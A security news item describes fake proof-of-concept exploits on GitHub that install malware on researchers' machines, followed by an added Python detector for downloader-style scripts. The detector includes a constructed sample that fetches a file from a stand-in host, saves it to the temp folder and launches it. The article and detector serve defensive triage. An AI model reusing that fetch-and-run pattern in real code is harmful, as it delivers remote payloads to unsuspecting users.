Fake zero-day PoC exploits on GitHub push Windows, Linux malware (Security News, June 2023)

Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware.
These malicious exploits are promoted on Twitter by alleged researchers at a fake cybersecurity company named 'High Sierra Cyber Security,' likely to target cybersecurity researchers and firms involved in vulnerability research.
In all cases, the malicious repositories host a Python script that acts as a malware downloader for Linux and Windows systems.
The malware is saved to the Windows %Temp% directory or, on Linux, under /home//.
The North Korean state-sponsored Lazarus hacking group conducted a similar campaign in January 2021, when it created fake vulnerability researcher personas on social media to target researchers with malware and zero-days.
More recently, academics found thousands of repositories on GitHub offering fake proof-of-concept exploits for various vulnerabilities, some of them infecting users with malware, malicious PowerShell, obfuscated info-stealer downloaders, Cobalt Strike droppers, and more.
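As an added example (not code from the article or from any project it mentions), a static triage check a researcher can run over a cloned PoC repository before executing anything: it flags Python files that combine a network download, a write under a temp or home directory, and a launch of the dropped file, which is the downloader pattern described above. The regexes and the two sample scripts are constructed for illustration and are assumptions, not indicators from the campaign.

```python
"""Static triage for a cloned proof-of-concept repository (added example)."""
import re
from pathlib import Path

# Constructed indicator patterns: a fetch, a drop location, and a launch.
# Tune these for your own triage pipeline; they are not from the article.
PATTERNS = {
    "fetch": re.compile(r"\b(urllib\.request|urlopen|requests\.get|wget|curl)\b"),
    "drop_path": re.compile(r"(%TEMP%|\bTEMP\b|tempfile|/home/|expanduser)"),
    "launch": re.compile(r"\b(subprocess\.(Popen|run|call)|os\.system|os\.startfile)\b"),
}


def score_source(source: str) -> dict:
    """Return which downloader behaviours a script's source text exhibits."""
    return {name: bool(rx.search(source)) for name, rx in PATTERNS.items()}


def is_suspicious(source: str) -> bool:
    """A script that fetches, drops to temp/home AND launches is treated as a downloader."""
    hits = score_source(source)
    return hits["fetch"] and hits["drop_path"] and hits["launch"]


def triage_directory(root: Path) -> list:
    """Walk a checked-out repository and list Python files matching the pattern."""
    return sorted(
        str(p) for p in root.rglob("*.py")
        if is_suspicious(p.read_text(errors="ignore"))
    )


# Constructed samples: a benign-looking network PoC and a downloader-style script.
BENIGN_POC = (
    "import socket\n"
    "s = socket.socket()\n"
    "s.connect(('127.0.0.1', 8080))\n"
    "s.send(b'A' * 300)\n"
)
DOWNLOADER = (
    "import os, urllib.request, subprocess\n"
    "dst = os.path.join(os.environ['TEMP'], 'update.exe')\n"
    "urllib.request.urlretrieve('http://example.invalid/p', dst)\n"
    "subprocess.Popen([dst])\n"
)

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_POC), ("downloader", DOWNLOADER)):
        print(label, score_source(src), "suspicious" if is_suspicious(src) else "ok")
```

Run `triage_directory(Path("path/to/cloned/repo"))` to list the files that merit a manual look before anything in the repository is executed.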